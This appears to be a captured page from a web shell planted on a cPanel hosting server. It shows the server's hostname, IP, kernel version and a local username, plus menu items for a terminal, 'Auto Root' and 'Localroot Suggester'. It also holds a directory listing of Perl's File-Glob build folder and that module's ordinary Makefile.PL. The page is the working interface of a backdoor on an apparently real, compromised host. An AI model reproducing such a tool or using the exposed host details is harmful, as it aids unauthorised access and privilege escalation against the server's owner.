Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
ext /
File-Glob /
Delete
Unzip
Name
Size
Permission
Date
Action
blib
[ DIR ]
drwxr-xr-x
2016-10-10 17:39
t
[ DIR ]
drwxr-xr-x
2015-02-14 16:56
Changes
1.85
KB
-r--r--r--
2014-12-27 11:48
Glob.bs
0
B
-rw-r--r--
2016-10-10 17:41
Glob.c
21.83
KB
-rw-r--r--
2016-10-10 17:39
Glob.o
18.27
KB
-rw-r--r--
2016-10-10 17:39
Glob.pm
12.38
KB
-r--r--r--
2014-12-27 11:48
Glob.xs
10.1
KB
-r--r--r--
2014-12-27 11:48
Makefile
29.28
KB
-rw-r--r--
2016-10-10 17:39
Makefile.PL
1.04
KB
-r--r--r--
2014-12-27 11:48
TODO
882
B
-r--r--r--
2014-12-27 11:48
bsd_glob.c
24.93
KB
-r--r--r--
2014-12-27 11:48
bsd_glob.h
3.73
KB
-r--r--r--
2014-12-27 11:48
bsd_glob.o
10.75
KB
-rw-r--r--
2016-10-10 17:39
const-c.inc
3.25
KB
-rw-r--r--
2016-10-10 17:39
const-xs.inc
4.28
KB
-rw-r--r--
2016-10-10 17:39
pm_to_blib
0
B
-rw-r--r--
2016-10-10 17:39
Save
Rename
use ExtUtils::MakeMaker; use ExtUtils::Constant 0.23 'WriteConstants'; WriteMakefile( NAME => 'File::Glob', VERSION_FROM => 'Glob.pm', OBJECT => 'bsd_glob$(OBJ_EXT) Glob$(OBJ_EXT)', realclean => {FILES=> 'const-c.inc const-xs.inc'}, ## uncomment for glob debugging (will cause make test to fail) # DEFINE => '-DGLOB_DEBUG', # OPTIMIZE => '-g', ); use Config; sub MY::cflags { package MY; my $inherited = shift->SUPER::cflags(@_); if ($Config::Config{archname} =~ /^aix/ and $Config::Config{use64bitall} eq 'define') { $inherited =~ s/\s-O\d?//m; } $inherited; } WriteConstants( PROXYSUBS => {autoload => 1}, NAME => 'File::Glob', NAMES => [qw(GLOB_ABEND GLOB_ALPHASORT GLOB_ALTDIRFUNC GLOB_BRACE GLOB_ERR GLOB_LIMIT GLOB_MARK GLOB_NOCASE GLOB_NOCHECK GLOB_NOMAGIC GLOB_NOSORT GLOB_NOSPACE GLOB_QUOTE GLOB_TILDE), {name => 'GLOB_CSH', value => 'GLOB_BRACE|GLOB_NOMAGIC|GLOB_QUOTE|GLOB_TILDE|GLOB_ALPHASORT', macro => 1}, ], BREAKOUT_AT => 8, );